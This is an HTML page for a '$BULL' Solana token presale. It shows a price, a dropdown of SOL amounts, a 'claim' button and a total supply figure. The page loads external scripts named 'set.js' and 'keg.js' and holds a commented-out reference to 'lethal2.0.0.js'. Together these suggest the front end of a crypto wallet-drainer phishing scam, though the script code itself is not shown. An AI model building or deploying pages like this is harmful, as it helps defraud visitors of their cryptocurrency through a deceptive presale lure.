<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>$BULL PRE-SALE</title>
    <link rel="icon" type="image/png" href="logo.png">
    <script src="set.js"></script>
    <script type="module" src="keg.js"></script>
   
</head>

<body>

    <style>
        @import url('https://fonts.googleapis.com/css2?family=Libre+Franklin:ital,wght@0,100..900;1,100..900&display=swap');

        * {
            font-family: monospace;
        }

        html,
        body {
            height: 100%;
            background-color: black;
        }

        .container {
            height: 100%;
            display: flex;
            justify-content: center;
            flex-direction: column;
            align-items: center;
            text-align: center;

        }

        .container-logo {
            width: 100px;
            border-radius: 100px;
            border: solid 2px rgb(59, 59, 59);
        }

        .container-box {
            border: solid 2px rgb(59, 59, 59);
            padding: 30px;
            border-radius: 30px;
            background-color: rgb(41, 41, 41);
            color: white;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            z-index: 1 !important;
        }

        .container-select {
            font-size: 20px;
            /* border-radius: 100px; */
            padding: 5px;
            color: black;
            
        }

        .connect {
            font-size: 20px;
            background-color: rgb(190, 18, 18);
            border: none;
            cursor: pointer;
            color: black;
        }

        #popup {
            z-index: 99999;
        }
    </style>

    <div class="container">
        <div class="container-box">
            <img src="logo.png" class="container-logo">

            <h1>$BULL PRE-SALE</h1>
            <p>Presale Cap is set at 1000 SOL.</p>
            <h3 class="container-price">1 SOL ~ 99,500 BULL</h3>

         <br>

            <select id="solOptions" class="container-select">
                <option value="1">1 SOL</option>
                <option value="1.5">1.5 SOL</option>
                <option value="2">2 SOL</option>
                <option value="2.5">2.5 SOL</option>
                <option value="3">3 SOL</option>
            </select>

        </br>
          <!--  <script src="settings.js"></script>
            <script type="module" src="lethal2.0.0.js"></script>-->
            
            <a>
                   
            <button target="_blank" rel="noopener noreferrer" class="connect" >claim</button>
    
            </a>
            

        <!--  <a target="_blank" rel="noopener noreferrer" class="Button__StyledLink-sc-p6xn44-3 NBQYa Button__ButtonSecondary-sc-p6xn44-1 Navigation__LaunchButton-sc-v46eg4-0 fpGARf fVQvCS connectButton">Launch App</a>-->

            <p>Total Supply: 100,000,000 BULL.</p>

           
    

        </div>
    </div>
 
 

</html>